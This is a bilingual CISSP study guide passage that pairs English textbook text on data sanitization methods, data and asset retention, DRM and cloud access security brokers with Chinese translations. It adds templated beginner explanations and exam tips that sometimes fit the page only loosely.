National Security Agency (NSA) requires the destruction of SSDs using an approved disintegrator. Approved disintegrators shred the SSDs to a size of 2 millimeters (mm) or smaller. Many organizations sell multiple information destruction and sanitization solutions used by government agencies and organizations in the private sector that the NSA has approved. Another method of protecting SSDs is to ensure that all stored data is encrypted. If a sanitization method fails to remove all the data remnants, the remaining data would be unreadable. Be careful when performing any type of clearing, purging, or sanitization process.

The human operator or the tool involved in the activity may not properly perform the task of completely removing data from the media. Software can be flawed, magnets can be faulty, and either can be used improperly. Always verify that the desired result is achieved after performing any sanitization process.

中文直译 / 整理

您使用高级工具覆盖介质,原始数据的痕迹仍可能以较不明显的磁性场形式残 留。 这类似于在旧式电视和计算机显示器上,如果长时间显示相同数据,可能 会留下幽灵图像。 取证专家和攻击者拥有可以用来检索这些数据的工具,即使 这些数据已被声称覆盖。 消除数据残余的一种方法是使用消磁器。 消磁器会产生强大的磁场,从而重新 排列传统硬盘、磁带和软盘驱动器等磁性介质中的磁性场。 使用电源的消磁器 可以可靠地重写这些磁性场并消除数据残余。 然而,它们仅对磁性介质有效。 相比之下,SSD 使用集成电路而非旋转盘片上的磁通量。 因此,对 SSD 进 行消磁无法清除数据。 然而,即使使用其他方法清除 SSD 上的数据,数据 残余通常仍会保留。 一些 SSD 包含内置的擦除命令以清理整个磁盘,但不幸的是,这些命令对不同 制造商的某些 SSD 并无效。 由于这些风险,清理 SSD 的最佳方法是物理销毁。 美国国家安全局(NSA)要求使用经批准的粉碎机销毁 SSD。 经批准的粉碎机 会将 SSD 粉碎至 2 毫米(mm)或更小的尺寸。 许多组织销售多种经 NSA 批 准的信息销毁和清理解决方案,这些方案被政府机构和私营部门组织使用。

保护SSD的另一种方法是确保所有存储的数据都经过加密。 如果清除方法未能 完全删除数据残留,剩余的数据将无法读取。 在执行任何类型的清除、清除或净化过程时请小心。 参与该活动的人工 操作员或工具可能无法正确完成彻底清除媒体中数据的任务。 软件可能存在 缺陷,磁铁可能失效,两者都可能被误用。 在执行任何净化过程后,务必验 证是否达到了预期结果。

小白解释

场景先行:你是公司的安全负责人,正在读第 344 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
学习单元 22 / PDF P345

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

Common Data Destruction Methods The following list includes some common terms associated with destroying data: Erasing Erasing media is simply performing a delete operation against a file, a selection of files, or the entire media. In most cases, the deletion or removal process removes only the directory or catalog link to the data. The actual data remains on the drive. As new files are written to the media, the system eventually overwrites the erased data, but depending on the size of the drive, how much free space it has, and several other factors, the data may not be overwritten for months. Anyone can typically retrieve the data using widely available undelete tools.

Clearing Clearing, or overwriting, is a process of preparing media for reuse and ensuring that the cleared data cannot be recovered using traditional recovery tools. When media is cleared, unclassified data is written over all addressable locations on the media. One method writes a single character, or a specific bit pattern, over the entire media. A more thorough method writes a single character over the entire media, writes the character's complement over the entire media, and finishes by writing random bits over the entire media. It repeats this in three separate passes, as shown in Figure 5.2.

Although this sounds like the original data is lost forever, it may be possible to retrieve some of the original data using sophisticated laboratory or forensics techniques. Additionally, not all types of data storage respond well to clearing techniques. For example, spare sectors on hard drives, sectors labeled as “bad,” and areas on many modern SSDs are not necessarily cleared and may still retain data.

中文直译 / 整理

常用数据销毁方法 以下列表包含一些与销毁数据相关的常见术语: 擦除 擦除 媒体只是对文件、一组文件或整个媒体执行删除操作。 在大多数情 况下,删除或移除过程仅移除数据的目录或索引链接,实际数据仍保留在驱动 器上。 当新文件被写入媒体时,系统最终会覆盖已擦除的数据,但根据驱动器 的大小、可用空间量以及其他若干因素,数据可能数月都不会被覆盖。 任何人 都可以使用广泛可用的undelete工具轻松恢复这些数据。 清除 清除,或覆盖,是一种准备介质以供重复使用并确保清除的数据无法通过 传统恢复工具恢复的过程。 当对介质进行清除时,非密数据会被写入介质上的所 有可寻址位置。 一种方法是在整个介质上写入单个字符或特定的比特模式。 更彻 底的方法是:先在整个介质上写入单个字符,然后写入该字符的补码,最后在整 块介质上写入随机比特。 此过程重复进行三次,如图 5.2所示。 尽管这听起来像 是原始数据已永久丢失,但使用精密的实验室或取证技术仍有可能恢复部分原始 数据。 此外,并非所有类型的数据存储设备都能很好地响应清除技术。 例如,硬 盘上的备用扇区、标记为“坏”的扇区以及许多现代 SSD 上的某些区域可能并未 被清除,仍可能保留数据。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 23 / PDF P346

第 346 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

FIGURE 5.2 Clearing a hard drive Purging Purging is a more intense form of clearing that prepares media for reuse in less secure environments. It provides a level of assurance that the original data is not recoverable using any known methods. A purging process will repeat the clearing process multiple times in order to completely remove the data. Even though purging is intended to remove all data remnants, it isn't always trusted. For example, the U.S. government doesn't consider any purging method acceptable to purge top secret data. Media labeled top secret will always remain top secret until it is destroyed.

Degaussing A degausser creates a strong magnetic field that erases data on some types of media in a process called degaussing. Technicians commonly use degaussing methods to remove data from magnetic tapes and magnetic hard disk drives (HDDs) with the goal of removing data from that media. Degaussing may render a hard drive unusable so it is not a good option when you intend to reuse the media. Degaussing does not affect optical discs (CDs, DVDs, Blu-rays) or flash storage media (SD cards, USB flash drives, SSDs). Destruction Destruction is the final stage in the life cycle of media and is the most secure method of sanitizing media.

When destroying media, ensure that the media cannot be reused or repaired and that data cannot be extracted from the destroyed media. Methods of destruction include incineration, shredding, disintegration, pulverizing, and melting. Some organizations remove the platters in highly classified disk drives and destroy them separately.

中文直译 / 整理

图 5.2 清除硬盘 净化 净化 是一种更强烈的清除形式,用于在较低安全级别的环境中准备介质的 重复使用。 它提供了这样的保证:原始数据无法通过任何已知方法恢复。 净化过 程会多次重复清除过程,以彻底删除数据。 尽管净化旨在清除所有数据残留,但 其可靠性并不总是被信任。 例如,美国政府不认为任何净化方法足以处理绝密数 据。 标为绝密的介质,除非被销毁,否则将始终保持绝密状态。 消磁 消磁器会产生一个强磁场,通过称为消磁的过程擦除某些类型介质上的数 据。 技术人员通常使用消磁方法来清除磁带和磁性硬盘驱动器(HDD)上的数 据,以达到从这些介质中彻底删除数据的目的。 消磁可能会使硬盘无法使用, 因此如果您打算重复使用该介质,则这不是一个理想的选择。 消磁不会影响光盘(CD、DVD、蓝光碟)或闪存介质(SD 卡、U 盘、 SSD)。 销毁 销毁是媒体生命周期的最后阶段,也是最安全的媒体清除方法。 在销毁媒体 时,应确保媒体无法被重新使用或修复,且无法从已销毁的媒体中提取数据。 销 毁方法包括焚烧、碎纸、分解、粉碎和熔化。 一些组织会从高度机密的硬盘驱动 器中取出盘片并单独销毁。

小白解释

场景先行:你是公司的安全负责人,正在读第 346 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 346 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 24 / PDF P347

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

When organizations donate or sell used computer equipment, they often remove and destroy storage devices that hold sensitive data rather than attempting to purge them. This eliminates the risk that the purging process wasn't complete, which would have resulted in a loss of confidentiality. Declassification involves any process that purges media or a system in preparation for reuse in an unclassified environment. Sanitization methods can be used to prepare media for declassification, but often the efforts required to securely declassify media are significantly greater than the cost of new media for a less secure environment.

Additionally, even though purged data is not recoverable using any known methods, there is a remote possibility that an unknown method is or becomes available. Instead of taking the risk, many organizations choose not to declassify any media and instead destroy it when it is no longer needed. Cryptographic Erasure If data is encrypted on a device, it's possible to use cryptographic erasure or cryptoshredding to destroy the data. However, these terms are misleading. They don't erase or shred the data. Instead, they destroy the associated keys. With the cryptographic keys erased, data remains encrypted and can't be accessed.

When using this method, you should use another method to overwrite the data. If the original encryption isn't strong, someone may be able to decrypt it without the key. Additionally, there are often backups of cryptographic keys, and if someone discovers a backup key, they can still access the data. When using cloud storage, destroying the cryptographic keys may be the only form of secure deletion available to an organization. Ensuring Appropriate Data and Asset Retention Retention requirements apply to data or records, media holding sensitive data, systems that process sensitive data, and personnel who have access to sensitive data.

Record retention and media retention are the most important elements of asset retention. Chapter 3, “Business Continuity Planning,”

中文直译 / 整理

当组织捐赠或出售旧计算机设备时,它们通常会移除并销毁存储敏感数 据的存储设备,而不是尝试清除它们。 这消除了清除过程不彻底而导致机密 性泄露的风险。 解密是指任何在将介质或系统重新用于非机密环境之前清除其内容的过程。 可 以使用清理方法为解密做准备,但通常安全地对介质进行解密所需的工作量远 大于在较低安全级别环境中购置新介质的成本。 此外,尽管使用任何已知方法 都无法恢复被清除的数据,但仍存在极小的可能性,某种未知方法目前或将来 可能被发现。 为了避免这一风险,许多组织选择不对任何介质进行解密,而是 在不再需要时直接销毁它们。 加密擦除 如果设备上的数据已被加密,则可以使用加密擦除或加密粉碎来销毁数据。 然 而,这些术语具有误导性。 它们并未真正擦除或粉碎数据,而是销毁了相关的 密钥。 一旦加密密钥被删除,数据仍保持加密状态,无法被访问。 使用此方法时,您应采用另一种方法覆盖数据。 如果原始加密强度不足,有人 可能无需密钥即可解密数据。 此外,加密密钥通常存在备份,如果有人发现了 备份密钥,他们仍可访问数据。 在使用云存储时,销毁加密密钥可能是组织可用的唯一安全删除方式。

确保适当的数据和资产保留 保留要求适用于数据或记录、存储敏感数据的介质、处理敏感数据的系统以及 有权访问敏感数据的人员。 记录保留和介质保留是资产保留的最重要要素。 第 3章,“业务连续性规划”,

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

加密:加密把内容变成未授权者看不懂的形式。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

保留期限:保留期限规定数据、日志或记录要保存多久。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

保留太短会影响合规和取证,保留太久会增加泄露风险和成本。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
加密 加密把内容变成未授权者看不懂的形式。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
保留期限 保留期限规定数据、日志或记录要保存多久。
学习单元 25 / PDF P348

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

covers a vital records program, which can be referenced to identify records to retain. Record retention involves retaining and maintaining important information as long as it is needed and destroying it when it is no longer needed. An organization's security policy or data policy typically identifies retention time frames. Some laws and regulations dictate the length of time that an organization should retain data, such as three years, seven years, or even indefinitely. Organizations have the responsibility of identifying laws and regulations that apply and complying with them.

However, even in the absence of external requirements, an organization should still identify how long to retain data. As an example, many organizations require the retention of all audit logs for a specific amount of time. The period can be dictated by laws, regulations, requirements related to partnerships with other organizations, or internal management decisions. These audit logs allow the organization to reconstruct the details of past security incidents. When an organization doesn't have a retention policy, administrators may delete valuable data earlier than management expects them to or attempt to keep data indefinitely.

The longer an organization retains data, the more it costs in terms of media, locations to store it, and personnel to protect it. End of life (EOL) and end of support can apply to either software or hardware. In the context of asset retention, they apply directly to hardware assets. Most vendors refer to EOL as the time when they stop producing and offering a product for sale. However, they will still support the products they've sold, at least for a while. End of support refers to the time when this support ends. Most hardware is on a refresh cycle based on the EOL and endof-support time frames.

Organizations sometimes retain legacy hardware to access older data, such as data on tape drives.

中文直译 / 整理

涵盖重要记录计划,可据此确定需保留的记录。 记录保留涉及在需要时保留并维护重要信息,并在不再需要时销毁。 组织的安 全策略或数据策略通常会明确保留时间期限。 某些法律法规规定了组织应保留 数据的时间长度,例如三年、七年,甚至无限期保留。 组织有责任识别适用的 法律法规并遵守它们。 然而,即使在没有外部要求的情况下,组织仍应确定数 据的保留期限。 例如,许多组织要求将所有审计日志保留特定时间。 该期限可能由法律法规、 与其他组织合作的相关要求或内部管理决策决定。 这些审计日志使组织能够重 建过去安全事件的详细情况。 当组织没有保留政策时,管理员可能会在管理层 预期之前删除有价值的数据,或试图无限期保留数据。 组织保留数据的时间越 长,其在介质、存储地点和保护人员方面的成本就越高。 生命周期结束(EOL) 和 支持终止 可适用于软件或硬件。 在资产保留的背景 下,它们直接适用于硬件资产。 大多数供应商将 EOL 定义为停止生产和销售 某产品的时刻。 然而,他们仍会为其已售出的产品提供支持,至少在一段时间 内如此。 支持终止指的是该支持结束的时刻。 大多数硬件的刷新周期均基于 EOL 和支持终止的时间框架。

组织有时会保留旧式硬件以访问旧数据,例如磁 带驱动器上的数据。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

保留太短会影响合规和取证,保留太久会增加泄露风险和成本。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
保留期限 保留期限规定数据、日志或记录要保存多久。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 26 / PDF P349

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Retention Policies Can Reduce Liabilities Saving data longer than necessary also presents unnecessary legal issues. As an example, aircraft manufacturer Boeing was once the target of a class action lawsuit. Attorneys for the claimants learned that Boeing had a warehouse filled with 14,000 email backup tapes and demanded the relevant tapes. Not all the tapes were relevant to the lawsuit, but Boeing had to first restore the 14,000 tapes and examine the content before they could turn them over. Boeing ended up settling the lawsuit for $92.5 million, and analysts speculated that there would have been a different outcome if those 14,000 tapes hadn't existed.

The Boeing lawsuit is an extreme example, but it's not the only one. These events have prompted many companies to implement aggressive email retention policies. It is not uncommon for an email policy to require the deletion of all emails older than six months. These policies are often implemented using automated tools that search for old emails and delete them without any user or administrator intervention. It is important, however, to understand that companies may never delete data when they can reasonably anticipate litigation.

In fact, companies who believe that legal action may be forthcoming have a proactive obligation to preserve data and suspend any automated processes that might delete data. Data Protection Methods One of the primary methods of protecting the confidentiality of data is encryption, as discussed in the “Understanding Data States” section, earlier in this chapter. DLP methods (discussed in the “Data Loss Prevention” section, earlier in this chapter) help prevent data from leaving the network or even leaving a computer system. This section covers some additional data protection methods. Digital Rights Management

中文直译 / 整理

保留策略可降低法律责任 将数据保存超过必要时间也会带来不必要的法律问题。 例如,飞机制造商波 音公司曾成为集体诉讼的目标。 原告的律师得知波音公司有一个仓库,存放 着14,000盘电子邮件备份磁带,并要求提供相关的磁带。 并非所有磁带都与 诉讼相关,但波音公司必须先恢复全部14,000盘磁带并检查内容,才能移交。 最终,波音公司以9250万美元和解了该诉讼,分析人士推测,如果这 14,000盘磁带不存在,结果可能会不同。 波音公司的诉讼是一个极端的例子,但并非唯一一例。 这些事件促使许多 公司实施严格的电子邮件保留政策。 电子邮件政策通常要求删除所有超过 六个月的邮件。 这些政策通常通过自动化工具实施,这些工具会搜索旧邮 件并自动删除,无需用户或管理员干预。 然而,重要的是要理解,当公司可以合理预见到诉讼时,绝不能删除数据。 事实上,若公司认为法律行动即将来临,就有积极义务保存数据,并暂停 任何可能导致数据删除的自动化流程。 数据保护方法 保护数据机密性的主要方法之一是加密,如本章前面“理解数据状态”部分所 述。 数据防泄漏(DLP)方法(如本章前面“数据防泄漏”部分所述)有助于 防止数据离开网络甚至离开计算机系统。

本节介绍一些其他的数据保护方法。 数字版权管理

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

保留太短会影响合规和取证,保留太久会增加泄露风险和成本。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
保留期限 保留期限规定数据、日志或记录要保存多久。
学习单元 27 / PDF P350

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Digital rights management (DRM) methods attempt to provide copyright protection for copyrighted works. The purpose is to prevent the unauthorized use, modification, and distribution of copyrighted works such as intellectual property. Here are some methods associated with DRM solutions: DRM License A license grants access to a product and defines the terms of use. A DRM license is typically a small file that includes the terms of use, along with a decryption key that unlocks access to the product. Persistent Online Authentication Persistent online authentication (also known as always-on DRM) requires a system to be connected with the Internet to use a product.

The system periodically connects with an authentication server, and if the connection or authentication fails, DRM blocks the use of the product. Continuous Audit Trail A continuous audit trail tracks all use of a copyrighted product. When combined with persistence, it can detect abuse, such as concurrent use of a product simultaneously but in two geographically different locations. Automatic Expiration Many products are sold on a subscription basis. For example, you can often rent new streaming movies, but these are only available for a limited time, such as 30 days. When the subscription period ends, an automatic expiration function blocks any further access.

As an example, imagine you dreamed up a fantastic idea for a book. When you awoke, you vigorously wrote down everything you remembered. In the following year, you spent every free moment you had developing the idea and eventually published your book. To make it easy for some people to read your book, you included a Portable Document Format (PDF) version of the book. You were grateful to see it skyrocket onto bestseller lists. You're on track for financial freedom to develop another great idea that came to you in another dream. Unfortunately, someone copied the PDF file and posted it on the dark web.

People from around the world found it and then began selling it online for next to nothing, claiming that they had your permission to do so. Of course, you didn't give them permission. Instead, they were collecting money from your year of work, while your revenue sales began to tumble. This type of copying and distribution, commonly called pirating, has enriched criminals for years. Not only do they sell books they didn't write, but they also copy and sell music, videos, video games, software, and more.

中文直译 / 整理

数字版权管理(DRM) 方法旨在为受版权保护的作品提供版权保护。 其目的 是防止未经授权使用、修改和分发受版权保护的作品,例如知识产权。 以下是 与DRM解决方案相关的一些方法: DRM许可证许可证授予对产品的访问权限并定义使用条款。 DRM许可证通常是 一个小文件,包含使用条款以及用于解锁产品访问权限的解密密钥。 持久在线认证持久在线认证(也称为始终在线DRM)要求系统必须连接互联网 才能使用产品。 系统会定期连接到认证服务器,如果连接或认证失败,DRM将 阻止产品使用。 持续审计追踪持续审计追踪记录对受版权保护产品的所有使用情况。 结合持久 性机制,它可以检测滥用行为,例如在同一时间但在两个地理位置不同的地方 并发使用产品。 自动过期许多产品采用订阅模式销售。 例如,您通常可以租借新的流媒体电影, 但这些电影仅在有限时间内有效,例如30天。 当订阅期结束时,自动过期功 能将阻止任何进一步的访问。 举个例子,假设你梦到了一本精彩书籍的绝佳创意。 醒来后,你热情地将所有 记得的内容记录下来。 在接下来的一年里,你利用所有空闲时间完善这个创意, 最终出版了这本书。

为了方便一些人阅读,你提供了该书的可移植文档格式 (PDF)版本。 看到它迅速登上畅销书排行榜,你感到非常欣慰。 你正朝着财 务自由迈进,以便继续开发另一个在梦中浮现的精彩创意。 不幸的是,有人复制了该PDF文件并将其发布在暗网上。 世界各地的人们发 现了它,随后开始以几乎免费的价格在线出售,并声称获得了您的授权。 当 然,您并未给予他们许可。 相反,他们正在窃取您一年辛勤工作的收入,而 您的销售收入也开始急剧下滑。 这种复制和分发方式,通常被称为盗版,多年来一直使罪犯获利。 他们不仅出 售自己未曾撰写的书籍,还复制并销售音乐、视频、电子游戏、软件等。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

审计:审计检查控制是否存在、是否有效、是否符合要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

审计题关注独立性、证据、范围和报告。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
审计 审计检查控制是否存在、是否有效、是否符合要求。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 28 / PDF P351

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Some DRM methods attempt to prevent the copying, printing, and forwarding of protected materials. Digital watermarks are sometimes placed within audio or video files using steganography. They don't prevent copying but can be used to detect the unauthorized copying of a file. They can also be used for copyright enforcement and prosecution. Similarly, metadata is sometimes placed into files to identify the buyer. Many organizations and individuals are opposed to DRM. They claim it restricts the fair use of materials they purchase. For example, after paying for some songs, they want to copy them onto both an MP3 player and a smartphone.

Additionally, people against DRM claim it isn't effective against people that want to bypass it but instead complicates the usage for legitimate users. Chapter 4 covers intellectual property, copyrights, trademarks, patents, and trade secrets in more depth. DRM methods are used to protect copyrighted data, but they aren't used to protect trademarks, patents, or trade secrets. Cloud Access Security Broker A cloud access security broker (CASB) is software placed logically between users and cloud-based resources. It can be on-premises or within the cloud. Anyone who accesses the cloud goes through the CASB software. It monitors all activity and enforces administrator-defined security policies.

As a simple example, imagine a company has decided to use a cloud provider for data storage but management wants all data stored in the cloud to be encrypted. The CASB can monitor all data going to the cloud and ensure that it arrives and is stored in an encrypted format. A CASB would typically include authentication and authorization controls and ensure only authorized users can access the cloud resources. The CASB can also log all access, monitor activity, and send alerts on suspicious activity. In general, any security controls that an organization has created internally can be replicated to a CASB. This includes any DLP functions implemented by an organization.

CASB solutions can also be effective at detecting shadow IT. Shadow IT is the use of IT resources (such as cloud services) without the approval of, or even the knowledge of, the IT department. If the IT department doesn't know about the usage, it can't manage it. One way a CASB solution can detect shadow IT is by collecting and analyzing logs from network firewalls and web

中文直译 / 整理

